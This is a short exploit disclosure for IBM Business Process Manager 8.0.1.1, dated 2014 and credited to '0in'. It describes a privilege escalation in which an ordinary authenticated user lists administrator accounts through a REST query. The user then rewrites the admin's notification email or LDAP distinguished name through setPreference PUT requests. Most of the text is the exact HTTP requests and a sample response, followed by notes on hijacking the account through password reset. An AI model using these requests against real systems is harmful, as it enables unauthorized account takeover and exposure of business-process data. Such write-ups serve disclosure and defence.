IBM Business Process Manager - User Account Reconfiguration



Exploit Title: IBM BMPS (BPM) User account reconfiguration/Privilege Escalation/Information Disclosure

Date: 31.01.14
Exploit Author: 0in
Software link: http://www-03.ibm.com/software/products/en/business-process-manager-family/
Version: 8.0.1.1 (newest versions can also be vulnerable)

Vulnerability Description:
Its possible to change some specfic values in accounts database (in my case it was LDAP) by authenticated but not privileged user, invoking setPreference action

------------------------------------------------------------------------------------
First of all, we should enumerate existing users to find administrator account.
We should proceed following request:

GET /rest/bpm/wle/v1/users?filter=*admin*&maxresult=11&assignTaskidFilter=[INT TASK ID]&namesonly=false&parts=all HTTP/1.1
x-requested-with: XMLHttpRequest

In result of this request we can get response like this:
{"status":"200","data":{"users":[{"userID":1,"userName":"admin","fullName":"Administrator BPMS","isDisabled":false,"primaryGroup":null,"emailAddress":"admin@corpo","userPreferences":{ "Portal Default Page":"/dashboards?dashboard=%2Fteamworks%2FexecuteServiceByName%3FprocessApp%3DSCIM%26serviceName%History%2Bprocess%25C3%25B3w%26snapshot%3D4.0.0%26zResumable%3Dtrue", "Task Email Address":"admin@corpo","Task Notification":"true","LDAPDistinguishedName":"CN=bpmsadmin,OU=confidential,OU=Users,OU=RU,DC= confidential,DC= confidential,DC=corp,DC= confidential ","Locale":"ru","Alert On Assign And Run":"true"},"tasksCollaboration":null,"memberships":["Debug","admins","authors","portal_admins","process_owners","allusers","All Users_S_da7e4d23-78cb-4483-*******",[…]

Ok, so now we have administrator username, in next step we should set his email or LDAPDistinguishedName to our, to invoke this, we should generate url like this:

PUT /rest/bpm/wle/v1/user/admin?action=setPreference&key=Task%20Email%20Address&value=AttackerEmail@corpo HTTP/1.1
x-requested-with: XMLHttpRequest

Or just set LDAP preferences to our:
PUT /rest/bpm/wle/v1/user/admin?action=setPreference&key=LDAPDistinguishedName&value= CN=ATTACKER_LOGIN,OU=w00tw00t,OU=Users,OU=Group,DC=my,DC=sub,DC=domain,DC=corpo HTTP/1.1


Now attacker can receive all notifications about victim processes in his email, attacker can change victim password using “forgotten password” option, change victim portal default page, LDAP Attributes. We have lot of other possibilities to exploit this situation it depends of BPMS service context.